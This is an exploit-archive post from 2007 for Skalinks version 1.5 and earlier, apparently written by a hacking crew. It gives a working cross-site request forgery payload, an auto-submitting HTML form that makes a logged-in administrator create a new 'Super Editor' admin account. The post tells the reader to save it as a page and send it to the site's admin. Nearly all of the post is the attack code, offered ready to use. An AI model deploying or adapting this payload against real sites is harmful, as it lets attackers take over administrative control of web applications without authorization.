Home / exploits skalinks-csrf.txt
Posted on 05 November 2007
########################################################################## # _ _ _ _ _____ _ _ # # | | | | | | (_) |_ _| (_) | | # # | |_| | __ _ ___| | ___ _ __ __ _ | | _ __ ___ _ __| | ___ # # | _ |/ _` |/ __| |/ / | '_ / _` | | || '_ / __| |/ _` |/ _ # # | | | | (_| | (__| <| | | | | (_| | _| || | | \__ | (_| | __/ # # \_| |_/\__,_|\___|_|\_\_|_| |_|\__, | \___/_| |_|___/_|\__,_|\___| # # __/ | # # |___/ # #________________________________________________________________________# | | | Site: www.hackinginside.altervista.org | | Project: Skalinks <= 1_5 Cross Site Request Forgery Add Admin | | Author: Vincy | | Email: djvincy@hotmail.it | |________________________________________________________________________| This code, must be saved in a HTML page and sended to the site admin. So the admin will add a new admin in the mySQL with that info. It work only if admin's logged. ------------------------------------------------------------------------------------------- <form action="http://site.com/path/admin/admin_account.php" name="add_admin" method="post"> <input type="text" name="admin_name" value="[ NOME ]"> <input type="text" name="admin_password" value="[ PASSWORD ]"> <input type="text" name="admin_email" value="[ EMAIL ]"> <select name="admin_type"><option value="2">Super Editor</option></select> <input type=hidden name="Add_admin" value="Add Admin"> </form> <script>document.add_admin.submit()</script> ------------------------------------------------------------------------------------------- # Vincy - Hacking Inside Crew